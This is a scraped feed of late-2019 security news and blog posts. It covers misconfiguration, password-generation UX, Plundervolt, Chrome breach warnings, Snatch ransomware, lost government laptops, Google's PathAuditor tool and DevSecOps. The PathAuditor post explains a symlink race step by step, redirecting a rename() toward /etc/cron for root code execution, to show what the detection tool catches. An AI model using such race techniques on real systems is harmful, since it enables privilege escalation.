Misconfiguration can happen at any level of the application stack, including the code, web and application servers, databases and frameworks.

Here are some signs of a poorly configured device:

  • Default account information: Attackers can easily break into your application if you’ve left your account name as ‘admin’ or ‘test’ and not changed the default password.
  • Third-party applications installed on a production server: A production server with additional applications on it leaves organisations exposed.
  • Ineffective firewalls: If more ports than necessary are open, or if unauthorised hosts can connect to the server, attackers can gain control of the server.
  • Missing operating system security patches: Attackers exploit security holes that have been identified by patches. If you haven’t applied those patches, you are vulnerable.

To avoid making those mistakes, organisations should use a strong application architecture that separates components, create a process for applying software updates and patches as they are released and conduct regular scans and audits to help detect future misconfigurations or missing patches.

3. Insider threats

Employees are often directly responsible for data breaches. These can be broken down into three categories:

  • Malicious actors, who steal or expose data for financial gain, political reasons, revenge, etc.
  • Accidental loss, such as misplacing a removable device.
  • Negligence, where, for reasons other than malice, employees fail to comply with security policies.

It’s hard to identify potential sources of insider error, because everyone in the organisation is susceptible. Accidental loss and negligence can be mitigated by providing your staff with regular awareness courses that remind them of their security obligations.

Preventing malicious actors requires stricter measures, such as:

  • Implementing access controls to limit the amount of information any one employee can view;
  • Creating policies restricting the use of removable devices; and
  • Monitoring unauthorised accounts.

Educate your employees on cyber security risks

Educated and informed employees are your first line of defence when it comes to information security.

Empower them to make better security decisions with our Information Security and Cyber Security Staff Awareness E-Learning Course.

This GCHQ-approved training course gives your employees a comprehensive overview of the threats they face and how to avoid them.

get started

A version of this blog was originally published on 1 December 2017.

The post Don’t gift cyber attackers access to your organisation this Christmas appeared first on IT Governance UK Blog.

Generated Passwords, UX and Security Absolutism

Generated Passwords, UX and Security Absolutism

Last month, Disney launched their new streaming service Disney+; "The best stories in the world, all in one place", apparently. The service was obviously rather popular because within days the tech (and mainstream) headlines were proclaiming that thousands of hacked Disney+ accounts were already for sale on hacking forums. This is becoming an alarmingly regular pattern with online services, the cause of which was soon confirmed by Disney:

Disney says that there is “no indication” of a security breach on Disney+, and that the source of the problem might be a so-called “credential stuffing” attack, in which hackers obtain passwords and usernames from Dark Web databases, and then use a brute force method to see if those passwords and usernames will work on new sites as well.

So the root cause is credential reuse. We've all done it at some time or other and the vast, vast majority of online users still do it today. But what if we could stop this attack dead in its tracks? What if one simple design decision in the auth process could completely rule out any chance of ever suffering a credential stuffing attack?

Generated Passwords, UX and Security Absolutism

Genius! Absolute genius! So why doesn't every site take away the ability for people to choose their own passwords? Why not just generate the password for them thus completely eradicating password reuse? Because it's an absolutely terrible idea, which brings me to the catalyst for this blog post:

I woke up earlier this week to a flood of tweets pointing me at this one with people aghast at the premise of firstly, storing passwords in plain text and secondly, emailing them out to people:

This is largely a practice of a bygone era and it's increasingly rare to see in modern times (and if you do see it, name and shame over at Plain Text Offenders). But how relevant is this criticism when the passwords are system-generated? Whilst the storage and delivery of the password in plain text certainly smells bad, when it's a (pseudo) random string, the risk is very different to when the user chooses their own secret:

For me, the issue isn't really about the storage and delivery of the password, it's about the practice of generating a password for someone that just doesn't add up. There's a fundamental flaw in the logic which I summarised as follows:

The tweet I quoted linked to a blog post titled Pentesting Training Website Challenges Authentication Best Practices and referenced the infosec community doing much "pitchfork raising". Somehow, despite my joining the conversation late, my single-word tweet featured at the beginning of that post which concluded that:

Practical Pentest Labs makes a great case for innovation and not following the pack in the IT security landscape.

So let's go through the registration process and look at why "the pack" doesn't implement things this way. Registration involves entering a username and email address which then delivers the following to your inbox:

Generated Passwords, UX and Security Absolutism

Now, put yourself in the shoes of someone who's just registered - how do you login? Copy and paste the password of course, that's the easy bit. But how do you login next time? Clearly, you're not going to remember the password so you need to record it somewhere, but where? Password manager? Great, which means you also have the ability to do something like this on account creation:

Generated Passwords, UX and Security Absolutism

This is 1Password's password generator and I use it for every new account I create so clearly there's no "uniqueness" value to assigning the user a password when you can generate your own strong password anyway. And if you have no password manager? You're not going to write it down because that would be absolutely painful, as would re-typing it on return to the website. In all likelihood you're simply not going to record the password at all which means then doing a password reset. Except it's not a reset, it's a recovery which is why they store it in plain text in the first place:

Now of course there are very well-established patterns for implementing a password reset so this remains a really odd design decision, but it's one that's tangential to the discussion around generating the password. Using the "forgot password" feature as a primary means of authentication was enthusiastically supported by a number of people who joined in on the conversation:

Let's be clear about the first bit: using this feature as a means of recovering access to an account isn't "genius" due to their decision to generate passwords because you can use exactly the same approach with any site that allows you to choose your own password. This is simply using the password reset feature for auth, pure and simple. And it has a heap of issues.

Firstly, it always involves more steps and more time than entering a username and password either from memory or password manager. It's no longer a matter of entering a username and password, it's enter the email address, wait for the email, go to the mail client, click the link, now you're in.

Secondly, "wait for the email" can be a protracted process. We've all had plenty of occasions where mail delivery is delayed and, in this case, that's a blocking process; you simply cannot log back in until the mail comes.

Thirdly, there's junk. Just this morning I discovered all my Disqus notifications were going direct to the spam box:

Generated Passwords, UX and Security Absolutism

I don't know if that's Disqus' fault or Office 365's fault, but what I do know is that a whole bunch of legitimate emails were no longer being delivered to my inbox (it wasn't just Disqus either). Now imagine you're dependent on that email simply to access a system you're already registered on - it's painful. Of course, you still need successful email delivery for registration verification and the times you genuinely need to perform an account recovery, but making that a dependency on every single authentication attempt is just nonsensical.

Much of the discussion had on this topic centred around the pain imposed on users choosing passwords:

You can argue this two different ways: On the one hand, manually creating a password that meets what is often arbitrary complexity criteria can be painful, and that's before you even begin listening to that nagging voice in the back of your head saying "also make it unique". On the other hand, passwords are one of the simplest security constructs we have and every single person using the web today understands how to use them. Indeed, this is what keeps human-chosen passwords alive today; just last year I wrote how Here's Why [Insert Thing Here] Is Not a Password Killer where I explained that despite the technical merits of alternate approaches, the simple reason we still use passwords the way we do today is because everyone understand them! It's exactly the same reason why I ended up standing in front of US congress testifying about the impact of data breaches on knowledge based authentication; relaying your date of birth as a means of verifying your identity is terrible in terms of security, but it prevails because every single person knows how to do it! You cannot escape these basic security truths and time and time again, usability trumps security.

Which brings me to the "security absolutism" term in the title of this post. Security absolutism - the view that all else is secondary to this one strongly held principle - was rampant throughout the discussion:

This feels like a very sage, grandfatherly thing for me to say, but this is simply not how the world works. If it was, they'd force 2FA on every single user and demand they purchase a U2F key for auth. As it stands, there's not even a self-service means of changing your password:

If security was such an important focus, they wouldn't still be supporting TLS 1.0 and 1.1 (SSL Labs will cap their grade to "B" in a few weeks from now for that faux pas), they'd use DNS CAA and they wouldn't be scoring a failing "F" grade on Security Headers due to no HSTS and no CSP. To be clear, none of these are particularly sensational findings, but the assertion that security is somehow sacrosanct and that everything else must be sacrificed in its pursuit is clearly not what's going on here.

I first used the term security absolutism a few years ago now when writing about responses to folks using Cloudflare to implement HTTPS on their sites. As with this post, I proposed that a myopic focus on security was unhealthy and causes people to miss the many fine nuances involved in protecting online assets whilst still delivering a usable service. For example, this tweet in response to the terrible UX of generating passwords for people:

Clearly this is untrue for Disney and for every other service I can think of that's recently been the victim of credential stuffing (geez that list is getting big). Not a single one I can name has, after being on the receiving end of an attack, turned around and said "You know what? No longer allowing users to choose their own password and instead just assigning one to them sure beats the UX of dealing with a hacked account!". Not. One.

This is also a case where this particular site is by no means a valid reference point for the general online populace. Practical Pentest Labs is targeted at people who want to "take their hacking skills to the next level", which one would assume means the audience is somewhat more security-conscious than your average punter. This audience is better equipped to store secrets such as a generated password but again, they're also more likely to have a password manager in the first place thus negating the uniqueness value proposition of a generated secret.

To be clear, I don't have any personal gripes with Practical Pentest Labs and if this method of auth is working for them then good on 'em, that's their call. But regardless of how much you might like their approach, it's an inescapable reality that their implementation is highly abnormal and that's not by accident - this model is simply a UX nightmare. This approach would completely solve Disney's credential stuffing problem by entirely eradicating password reuse, that part I agree on:

But as for "all sites should generate the user's password", no, you're never going to see it happen at Disney because they actually want customers! This, again, is security absolutism because it places security above and beyond all else and damn the consequences.

By all means, people should robustly debate the merits of alternate auth systems, but you cannot escape the reality that no matter how endorsed you might be in this approach, websites simply don't implement it. There are very good reasons why not and if you're inclined to chime in on the comments section in support of generated passwords, perhaps start with thinking about why this approach is so rarely seen.

Plundervolt! A new Intel Processor ‘undervolting’ Vulnerability

Researchers at the University of Birmingham have identified a weakness in Intel’s processors: by 'undervolting' the CPU, Intel’s secure enclave technology becomes vulnerable to attack.
A little bit of undervolting can cause a lot of problems

Modern processors are being pushed to perform faster than ever before – and with this comes increases in heat and power consumption. To manage this, many chip manufacturers allow frequency and voltage to be adjusted as and when needed – known as ‘undervolting’ or ‘overvolting’. This is done through privileged software interfaces, such as a “model-specific register” in Intel Core processors.

An international team of researchers from the University of Birmingham’s School of Computer Science along with researchers from imec-DistriNet (KU Leuven) and Graz University of Technology has been investigating how these interfaces can be exploited in Intel Core processors to undermine the system’s security in a project called Plundervolt.

Results released today and accepted to IEEE Security & Privacy 2020, show how the team was able to corrupt the integrity of Intel SGX on Intel Core processors by controlling the voltage when executing enclave computations – a method used to shield sensitive computations for example from malware. This means that even Intel SGX's memory encryption and authentication technology cannot protect against Plundervolt.

Intel has already responded to the security threat by supplying a microcode update to mitigate Plundervolt. The vulnerability has a CVSS base score of 7.9. high under CVE-2019-11157.
David Oswald, Senior Lecturer in Computer Security at the University of Birmingham, says: “To our knowledge, the weakness we’ve uncovered will only affect the security of SGX enclaves. Intel responded swiftly to the threat and users can protect their SGX enclaves by downloading Intel’s update.”

Better password protections in Chrome – How it works

Today, we announced better password protections in Chrome, gradually rolling out with release M79. Here are the details of how they work.

Warnings about compromised passwords
Google first introduced password breach warnings as a Password Checkup extension early this year. It compares passwords and usernames against over 4 billion credentials that Google knows to have been compromised. You can read more about it here. In October, Google built the Password Checkup feature into the Google Account, making it available from

Chrome’s integration is a natural next step to ensure we protect even more users as they browse the web. Here is how it works:
  • Whenever Google discovers a username and password exposed by another company’s data breach, we store a hashed and encrypted copy of the data on our servers with a secret key known only to Google.
  • When you sign in to a website, Chrome will send a hashed copy of your username and password to Google encrypted with a secret key only known to Chrome. No one, including Google, is able to derive your username or password from this encrypted copy.
  • In order to determine if your username and password appears in any breach, we use a technique called private set intersection with blinding that involves multiple layers of encryption. This allows us to compare your encrypted username and password with all of the encrypted breached usernames and passwords, without revealing your username and password, or revealing any information about any other users’ usernames and passwords. In order to make this computation more efficient, Chrome sends a 3-byte SHA256 hash prefix of your username to reduce the scale of the data joined from 4 billion records down to 250 records, while still ensuring your username remains anonymous.
  • Only you discover if your username and password have been compromised. If they have been compromised, Chrome will tell you, and we strongly encourage you to change your password.
You can control this feature in the “Sync and Google Services” section of Chrome Settings. Enterprise admins can control this feature using the Password​Leak​Detection​Enabled policy setting.

Real-time phishing protection: Checking with Safe Browsing’s blocklist in real time.
Chrome’s new real-time phishing protection is also expanding existing technology — in this case it’s Google’s well-established Safe Browsing.

Every day, Safe Browsing discovers thousands of new unsafe sites and adds them to the blocklists shared with the web industry. Chrome checks the URL of each site you visit or file you download against this local list, which is updated approximately every 30 minutes. If you navigate to a URL that appears on the list, Chrome checks a partial URL fingerprint (the first 32 bits of a SHA-256 hash of the URL) with Google for verification that the URL is indeed dangerous. Google cannot determine the actual URL from this information.

However, we’re noticing that some phishing sites slip through our 30-minute refresh window, either by switching domains very quickly or by hiding from Google's crawlers.

That’s where real-time phishing protections come in. These new protections can inspect the URLs of pages visited with Safe Browsing’s servers in real time. When you visit a website, Chrome checks it against a list stored on your computer of thousands of popular websites that are known to be safe. If the website is not on the safe-list, Chrome checks the URL with Google (after dropping any username or password embedded in the URL) to find out if you're visiting a dangerous site. Our analysis has shown that this results in a 30% increase in protections by warning users on malicious sites that are brand new.

We will be initially rolling out this feature for people who have already opted-in to “Make searches and browsing better” setting in Chrome. Enterprises administrators can manage this setting via the Url​Keyed​Anonymized​Data​Collection​Enabled policy settings.

Expanding predictive phishing protection
Your password is the key to your online identity and data. If this key falls into the hands of attackers, they can easily impersonate you and get access to your data. We launched predictive phishing protections to warn users who are syncing history in Chrome when they enter their Google Account password into suspected phishing sites that try to steal their credentials.

With this latest release, we’re expanding this protection to everyone signed in to Chrome, even if you have not enabled Sync. In addition, this feature will now work for all the passwords you have stored in Chrome’s password manager.

If you type one of your protected passwords (this could be a password you stored in Chrome’s password manager, or the Google Account password you used to sign in to Chrome) into an unusual site, Chrome classifies this as a potentially dangerous event.

In such a scenario, Chrome checks the site against a list on your computer of thousands of popular websites that are known to be safe. If the website is not on the safe-list, Chrome checks the URL with Google (after dropping any username or password embedded in the URL). If this check determines that the site is indeed suspicious or malicious, Chrome will immediately show you a warning and encourage you to change your compromised password. If it was your Google Account password that was phished, Chrome also offers to notify Google so we can add additional protections to ensure your account isn't compromised.

By watching for password reuse, Chrome can give heightened security in critical moments while minimizing the data it shares with Google. We think predictive phishing protection will protect hundreds of millions more people.

SECURITY ALERT: Snatch Ransomware Reboots Your PC in Safe Mode to Avoid Detection

Ransomware is experiencing a resurgence in the second half of 2019 and it will probably grow in 2020, which is about to begin, too. In perhaps the most disturbing ransomware development of the year, a newcomer has developed a novel strategy to bypass Antivirus detection. The Snatch ransomware starts its activity by rebooting Windows computers in Safe Mode.

This allows it to elude Antivirus detection since it only starts behaving like ransomware after rebooting. Unfortunately, most commercial Antivirus programs don’t initialize in Windows Safe Mode, since that type of booting is only used as a temporary state for troubleshooting a malfunctioning system.

It’s not the first time malware has found ways to disable Windows defenses and trick it, but the Snatch ransomware has the potential to be the most damaging attack vector yet. I can’t stress the importance of learning about Snatch and taking all defensive measures against it.

How the Snatch Ransomware Works

After the Snatch ransomware successfully infects a computer, it doesn’t begin behaving like ransomware (encrypting files) right away. This would cause it to get detected by whatever Antivirus software the machine is running.

Instead, Snatch exploits a Windows vulnerability which allows it to reboot the system in safe mode. Once it reaches Windows Safe Mode, the ransomware will finally start doing its expected act of encrypting files. Since by that time the Antivirus software is not turned on, it can proceed with encryption uninterrupted.

Even if you get some wind that you might be infected, there’s little chance of eluding it. This is what makes the Snatch ransomware so dangerous and difficult to disinfect.

From the get-go, it will set itself up as a service within the operating system, making sure it will run even during a system reboot. Then, it simply forces that reboot to take place, effectively making sure the playing field is clear of all adversaries (endpoint security solutions such as Antivirus software).

The reason the Snatch ransomware is able to do this is that its creators found a way to exploit a Windows vulnerability. By using a registry key, Snatch can embed itself in the list of services that survive a Safe Mode reboot.

Sophos Labs, the team of researchers who initially discovered this new ransomware behavior, says this is a major public danger. Other ransomware groups could soon borrow the Safe Mode trick, leaving plenty of Antivirus software virtually useless against them.

Since most consumers and businesses sadly rely only on a regular Antivirus for protection (at best), this could lead to successful ransomware attacks on an unprecedented scale.

More info on the Snatch Ransomware

The ransomware group which created the Snatch ransomware has been active since summer 2018. The Safe Mode trick used by the ransomware now seems to be a recent development, but these guys were clearly remarkable from the start.

They didn’t go after consumer targets (back then) through mass-delivered spam campaigns or browser exploit kits, as most ransomware do. Instead, they focused on high profile, government or corporate targets. Since these targets have the money for bigger payouts, they obviously make more attractive targets for big game hunters like Snatch.

The group has been operating as a business, advertising for affiliate partners and looking for collaborators since last year. Here is an ad from one of the group’s operators (mentioning that they only work with Russian speakers).

snatch forum ad looking for affiliates

Photo by Sophos, via ZDnet.

Especially when targeting large organizations, the Snatch ransomware doesn’t just shoot in the dark. They do their homework really well about who they’re after, much like in the process of spear-phishing.

They buy access to a network or work with other hackers to breach their target’s systems if they can’t get in themselves. Then, they stay silent for weeks and even months, gathering more info, observing and waiting. The ransomware part of the attack only starts to unfold once the Snatch team has covered all their basis and the victory is all-but-guaranteed.

Furthermore, unlike other ransomware gangs who simply encrypt files and then demand to be paid for the encryption key, Snatch also steals valuable data. The researchers who have been investigating the Snatch ransomware gang found evidence that they also engage in data theft through it.

Thus, even if you pay the ransom to get your files back (a strategy we never recommend, even if it means losing your files), you can later find it leaked and for sale on the dark web.

Coverware, a company that sometimes negotiates ransomware payouts on behalf of the victims, told Sophos that they privately handled 12 payouts for the Snatch infection between July and October 2019. The payments ranged between $2,000 and $35,000. The only publicly known case of Snatch ransomware infection was the web hosting company. So far, the ransomware gang managed to keep a low profile.

How to Stay Safe from the Snatch Ransomware

Priority no #1: Get your security straightened out (DNS shields up!)

No matter how good you think your Antivirus solution is, this time it might not cut it. You definitely need to up your game with a DNS traffic filter which helps detect unknown threats and blocks ransomware before it can reach your system.

Unlike reactive solutions like Antivirus software, a proactive solution like our Thor Foresight Enterprise will prevent the ransomware payload from reaching your systems. It will also block numerous other ways that hackers usually employ to get into your systems, too. Essentially, if the Snatch ransomware strain manages to infiltrate your systems, no reactive security solution will be able to help you, no matter how reliable it has been in the past. We are entering a new and more dangerous world of online threats. It’s time to employ security solutions that can keep up with it.

Priority no #2: Spread the word and educate your users

No one can afford to stop learning and just leave security to the experts (system admins and so on). Even if you have the best EDR solution out there, distracted and uninformed users can jeopardize all the security efforts.

There’s no way around it anymore: everyone needs to be on their toes and learn more about how contemporary threats work. As these threats evolve and change, so should the best security practices that users must employ in their online activity.

You can get started with our free cybersecurity resources here. It’s simple, actionable advice and no matter how non-technical you are, as long as you read a bit every few days, you’ll be better prepared to handle cyber-emergencies.

The post SECURITY ALERT: Snatch Ransomware Reboots Your PC in Safe Mode to Avoid Detection appeared first on Heimdal Security Blog.

MoJ Reports Over 400% Increase in Lost Laptops in Three Years

Apricorn, the leading manufacturer of software-free, 256-bit AES XTS hardware-encrypted USB drives, today announced new findings from Freedom of Information (FoI) requests submitted to five government departments into the security of devices held by public sector employees. The Ministry of Justice (MoJ) lost 354 mobile phones, PCs, laptops and tablet devices in FY 2018/19 compared with 229 between 2017/2018. The number of lost laptops alone, has risen from 45 in 2016/17 to 101 in 2017/18 and up to 201 in 2018/2019, an increase of more than 400% in three years.

FoI requests were submitted to the MoJ, Ministry of Education (MoE), Ministry of Defence (MoD), NHS Digital and NHS England during September-November 2019. Of the five government departments contacted, three out of five government departments responded. The MoE also reported 91 devices lost or stolen in 2019, whilst NHS Digital have lost 35 to date in 2019.

“Whilst devices are easily misplaced, it’s concerning to see such vast numbers being lost and stolen, particularly given the fact these are government departments ultimately responsible for volumes of sensitive public data. A lost device can pose a significant risk to the government if it is not properly protected” said Jon Fielding, Managing Director, EMEA, Apricorn.

When questioned about the use of USB and other storage devices in the workplace, or when working remotely, all three departments confirmed that employees use USB devices. The MoJ added that all USB ports on laptops and desktops are restricted and can only be used when individuals have requested that the ports be unlocked. Each of the responding departments noted that all USB and storage devices are encrypted.

“Modern-day mobile working is designed to support the flexibility and efficiency increasingly required in 21st-century roles, but this also means that sensitive data is often stored on mobile and laptop devices. If a device that is not secured is lost and ends up in the wrong hands, the repercussions can be hugely detrimental, even more so with GDPR now in full force”, noted Fielding.

In a survey by Apricorn earlier this year, roughly a third (32%) of respondents said that their organisation had already experienced a data loss or breach as a direct result of mobile working and to add to this, 30% of respondents from organisations where the General Data Protection Regulation (GDPR) applies were concerned that mobile working is an area that will most likely cause them to be non-compliant.

All responding sectors did confirm that they have security policies in place that cover all mobile, storage and laptop devices.

“Knowing that these government departments have policies in place to protect sensitive data is somewhat reassuring, however, they need to be doing a lot more to avoid the risk of a data breach resulting from these lost devices. Corporately approved, hardware encrypted storage devices should be provided as standard. These should be whitelisted on the IT infrastructure, blocking access to all non-approved media. Should a device then ‘go missing’ the data cannot be accessed or used inappropriately” Fielding added.

About the FoI Requests
The research was conducted through Freedom of Information requests submitted through The requests, submitted between September and November 2019, along with the successful responses can be found at:

GNU Radio Primer

Ray Felch // Disclaimer: Be sure to use a faraday bag or cage before transmitting any data so you don’t accidentally break any laws by illegally transmitting on regulated frequencies. Additionally, intercepting and decrypting someone else’s data is illegal, so be careful when researching your traffic. Preface: Recently, I introduced myself to the world of […]

The post GNU Radio Primer appeared first on Black Hills Information Security.

Optiv Announces New Software Assurance as-a-Service Offering Powered by Veracode

In an effort to help drive collaboration between security, development, and operations, improve speed to market, and ensure software is secure from the start, Optiv has released its new Software Assurance as-a-Service (SAaaS) offering. This program pairs Optiv’s consulting and security services with Veracode’s cloud-based, end-to-end application security solutions to give companies a programmatic approach to DevSecOps.

In today’s world, every company is a software company and, as a result, one of the top attack vectors for software-driven and supported organizations is the application. Just as development teams are increasingly integrating automated security into their workflows, security teams are looking for support to plan, build, and run strong application security programs that deliver on the overarching goals of the business.

Through SAaaS, DevSecOps teams are assisted with detection, analysis, and response to application vulnerabilities with Veracode Static Analysis, Veracode Dynamic Analysis, and Veracode Software Composition Analysis. In order to ensure that the flaws aren’t just found, but also fixed, the Optiv SAaaS solution is inclusive of software assurance expertise for code review, threat modeling, SDLC workshops, architectural review, and program development.

Optiv SAaaS enables modern organizations of all sizes and maturity levels to take advantage of a highly scalable platform and seamless integration to build a customized AppSec program that delivers secure software faster. This offering can help companies empower their development and security teams, lower their security risk, and turn security into a competitive advantage.

Learn more here.

Detecting unsafe path access patterns with PathAuditor

cat /home/user/foo

What can go wrong if this command runs as root? Does it change anything if foo is a symbolic link to /etc/shadow? How is the output going to be used?

Depending on the answers to the questions above, accessing files this way could be a vulnerability. The vulnerability exists in syscalls that operate on file paths, such as open, rename, chmod, or exec. For a vulnerability to be present, part of the path has to be user controlled and the program that executes the syscall has to be run at a higher privilege level. In a potential exploit, the attacker can substitute the path for a symlink and create, remove, or execute a file. In many cases, it's possible for an attacker to create the symlink before the syscall is executed.

At Google, we have been working on a solution to find these potentially problematic issues at scale: PathAuditor. In this blog post we'll outline the problem and explain how you can avoid it in your code with PathAuditor.

Let’s take a look at a real world example. The tmpreaper utility contained the following code to check if a directory is a mount point:
if ((dst = malloc(strlen(ent->d_name) + 3)) == NULL)
       message (LOG_FATAL, "malloc failed.\n");
strcpy(dst, ent->d_name);
strcat(dst, "/X");
rename(ent->d_name, dst);
if (errno == EXDEV) {

This code will call rename("/tmp/user/controlled", "/tmp/user/controlled/X"). Under the hood, the kernel will resolve the path twice, once for the first argument and once for the second, then perform some checks if the rename is valid and finally try to move the file from one directory to the other.

However, the problem is that the user can race the kernel code and replace the “/tmp/user/controlled” with a symlink just between the two path resolutions.

A successful attack would look roughly like this:
  • Make “/tmp/user/controlled” a file with controlled content.
  • The kernel resolves that path for the first argument to rename() and sees the file.
  • Replace “/tmp/user/controlled” with a symlink to /etc/cron.
  • The kernel resolves the path again for the second argument and ends up in /etc/cron.
  • If both the tmp and cron directories are on the filesystem, the kernel will move the attacker controlled file to /etc/cron, leading to code execution as root.
Can we find such bugs via automated analysis? Well, yes and no. As shown in the tmpreaper example, exploiting these bugs can require some creativity and it depends on the context if they’re vulnerabilities in the first place. Automated analysis can uncover instances of this access pattern and will gather as much information as it can to help with further investigation. However, it will also naturally produce false positives.

We can’t tell if a call to open(/user/controlled, O_RDONLY) is a vulnerability without looking at the context. It depends on whether the contents are returned to the user or are used in some security sensitive way. A call to chmod(/user/controlled, mode) depending on the mode can be either a DoS or a privilege escalation. Accessing files in sticky directories (like /tmp) can become vulnerabilities if the attacker found an additional bug to delete arbitrary files.

How Pathauditor works

To find issues like this at scale we wrote PathAuditor, a tool that monitors file accesses and logs potential vulnerabilities. PathAuditor is a shared library that can be loaded into processes using LD_PRELOAD. It then hooks all filesystem related libc functions and checks if the access is safe. For that, we traverse the path and check if any component could be replaced by an unprivileged user, for example if a directory is user-writable. If we detect such a pattern, we log it to syslog for manual analysis.

Here's how you can use it to find vulnerabilities in your code:
  • LD_PRELOAD the library to your binary and then analyse its findings in syslog. You can also add the library to /etc/, which will preload it in all binaries running on the system.
  • It will then gather the PID and the command line of the calling process, arguments of the vulnerable function, and a stack trace -- this provides a starting point for further investigation. At this point, you can use the stack trace to find the code path that triggered the violation and manually analyse what would happen if you would point the path to an arbitrary file or directory.
  • For example, if the code is opening a file and returning the content to the user then you could use it to read arbitrary files. If you control the path of chmod or chown, you might be able to change the permissions of chosen files and so on.
PathAuditor has proved successful at Google and we're excited to share it with the community. The project is still in the early stages and we are actively working on it. We look forward to hearing about any vulnerabilities you discover with the tool, and hope to see pull requests with further improvements.

Try out the PathAuditor tool here.

Marta Rożek was a Google Summer intern in 2019 and contributed to this blog and the PathAuditor tool

Weekly Update 168

Weekly Update 168

I'm presently on the YOW! conference tour which means doing the same keynote three times over in Sydney, Brisbane and Melbourne. It's my first time back at YOW! since 2015 and it's always a nice way to wrap up the year, especially the Brisbane leg I'm on at the moment in my home state. That's kept me busy, but it's some tweets last week that have kept me entertained so I'm talking about those as well as some reflections on what is now 6 years of running HIBP.

Next update I'll try and push out a little earlier to align with YOW! in Melbourne and hopefully give myself a bit more downtime come the weekend.

Weekly Update 168
Weekly Update 168
Weekly Update 168
Weekly Update 168


  1. It's not just Let's Encrypt issuing certs to phishing sites (and that's fine, so let's stop throwing them under the bus for it)
  2. Plain text password storage - even generated ones - is wrong on many levels (the UX alone just doesn't make any sense)
  3. Big thanks to Whois XML API for sponsoring my blog this week! A lack of domain intelligence causes data breaches. Test their Security Enterprise API & Data Feed packages with free credits!

The Guardian view on Boris Johnson’s NHS plan: trading patient data | Editorial

Donald Trump has made clear he wants a post-Brexit Britain to let US tech companies and big pharma access medical records

The NHS is a goldmine of patient data which the United States wants to be quarried by some of its biggest companies. Britain’s health service is home to a unique medical dataset that covers the entire population from birth to death. Jeremy Corbyn’s NHS press conference revealed that the US wanted its companies to get unrestricted access to the UK’s medical records, thought to be worth £10bn a year. A number of tech companies – including Google – already mine small parts of the NHS store. Ministers have been treading carefully after an attempt to create a single patient database for commercial exploitation was scrapped in 2016 when it emerged there was no way for the public to work out who would have access to their medical records or how they were using them.

However, such caution might be thrown to the wind if Boris Johnson gets his way over Brexit – and patients’ privacy rights are traded away for US market access. This would be a damaging step, allowing US big tech and big pharma to collect sensitive, personal data on an unprecedented scale. Donald Trump’s officials have already made clear that this is what they are aiming for. In the leaked government records of talks between US and UK trade representatives White House officials state that “the free flow of data is a top priority” in a post-Brexit world. Trump’s team see Brexit as an opportunity “to avoid forcing companies to disclose algorithms”. The US wants the UK to drop the EU’s 2018 data law, in which individuals must be told what is happening with their medical data, even if scrubbed of personal identifiers.

Continue reading...

Its Time to Help Defend Organizations Worldwide


I trust this finds you all doing well. It has been a few months since I last blogged - pardon the absence. I had to focus my energies on helping the world get some perspective, getting 007G ready for launch, and dealing with a certain nuisance.

Having successfully accomplished all three objectives, it is TIME to help defend organizations worldwide from the SPECTRE of potentially colossal compromise, which is a real cyber security risk that looms over 85% of organizations worldwide.

When you know as much as I do, care as much as I do, and possess as much capability as I do, you not only shoulder a great responsibility, you almost have an obligation to educate the whole world about cyber security risks that threaten their security.

So, even though I barely have any time to do this, in the interest of foundational cyber security worldwide, I'm going to start sharing a few valuable perspectives again, and do so, on this blog, that blog and the official PD blog (;see below.)

Speaking of which, earlier this week, I had the PRIVILEGE to launch the official PD blog -

Stay tuned for some valuable cyber security insights right here from January 06, 2020
and let me take your leave with a befitting (and one of my favorite) song(s) -

Best wishes,

PS: Just a month ago, the $ Billion Czech cyber security company Avast was substantially compromised, and guess what the perpetrators used to compromise them? They used the EXACT means I had clearly warned about TWO years ago, right here.

DevSecOps Challenges From a Security Perspective

The transition from DevOps to DevSecOps requires security professionals to have a whole new understanding of development processes, priorities, tools, and painpoints. It’s no longer feasible for security professionals to get by with a superficial understanding of how developers work. But this understanding can be a significant undertaking for most security pros who haven’t had to be immersed in the development side of the house previously.

In its new report, Building an Enterprise DevSecOps Program, analyst firm Securosis notes of security teams and DevSecOps, “Their challenge is to understand what development is trying to accomplish, integrate with them in some fashion, and figure out how to leverage automated security testing to be at least as agile as development.”

In this same paper, Securosis highlights the questions security professionals ask them most often surrounding DevSecOps, which include “can we realistically modify developer behavior?” “What tools do we start with to ‘shift left’” and “how do we integrate security testing into the development pipeline?” These are all valid and important questions, but Securosis points out that there are also questions security teams should be asking, but aren’t, including:

  • How do we fit — operationally and culturally — into DevSecOps?
  • How do we get visibility into Development and their practices?
  • How do we know changes are effective? What metrics should we collect and monitor?
  • How do we support Development?
  • Do we need to know how to code?

The questions the security team is currently asking are about security tasks in DevSecOps; the questions they aren’t asking are about how to understand and work with the development organization. And those are the questions they should start asking. Where to start? The key development areas security teams need to understand when trying to get a handle on application security include the following:

Process: At the very least understand why development processes have changed over the years, what they are trying to achieve, and make sure security testing embraces the same ideals.

Developer tools: You need to understand the tools developers use to manage the code they are building in order to understand where code can be inspected for security issues.

Code: Security tests are shifting left and looking at code, not fully developed applications. The traditional thinking about security audits needs to shift as well.

Open source: You would be hard-pressed to find an app that isn’t made up primarily of open source code. Understand why, and then work with the development team to help them continue to use open source code, but in a secure way.

How security tools affect developer processes: Make sure the security tools you select integrate with the tools and processes developers already use and don’t slow them down with false positives.

Cultural dynamics: You need to fully understand the development team’s goals and priorities – which are most often centered around speed. That understanding is key to getting developer buy-in and acceptance.

SDLC: It’s best practice to include some kind of security analysis in each phase of the software lifecycle. For instance, threat modeling during design, and software composition analysis during development. In this way, you establish a process-independent AppSec program that will work with varying development processes.

For more details on these development areas and practical advice on building an effective DevSecOps program, check out the full Securosis report.

Cyber News Rundown: ZeroCleare Malware

Reading Time: ~ 2 min.

ZeroCleare Malware Wiping Systems

IBM researchers have been tracking the steady rise in ZeroCleare deployments throughout the last year, culminating in a significant rise in 2019. This malware is deployed on both 32 and 64-bit systems in highly targeted attacks, with the capability to completely wipe the system by exploiting the EldoS RawDisk driver (which was also used in prior targeted attacks). The malware itself appears to be spreading through TeamViewer sessions and, though the 32-bit variant seems to crash before wiping can begin, the 64-bit variant has the potential to cause devastating damage to the multi-national corporations being targeted.

FTC Scam Threatens Victims with Terrorism Charges

FTC officials recently made an announcement regarding scam letters purporting to be from the commission and the numerous complaints the letters have sparked from the public. Victims of the scam are told that, due to some suspicious activity, they will be personally and financially monitored as well as face possible charges for terrorism. These types of scams are fairly common and have been in use for many years, often targeting the elderly with greater success.

Take back your privacy. Learn more about the benefits of a VPN.

Misreported Data Breach Costs Hospital Millions

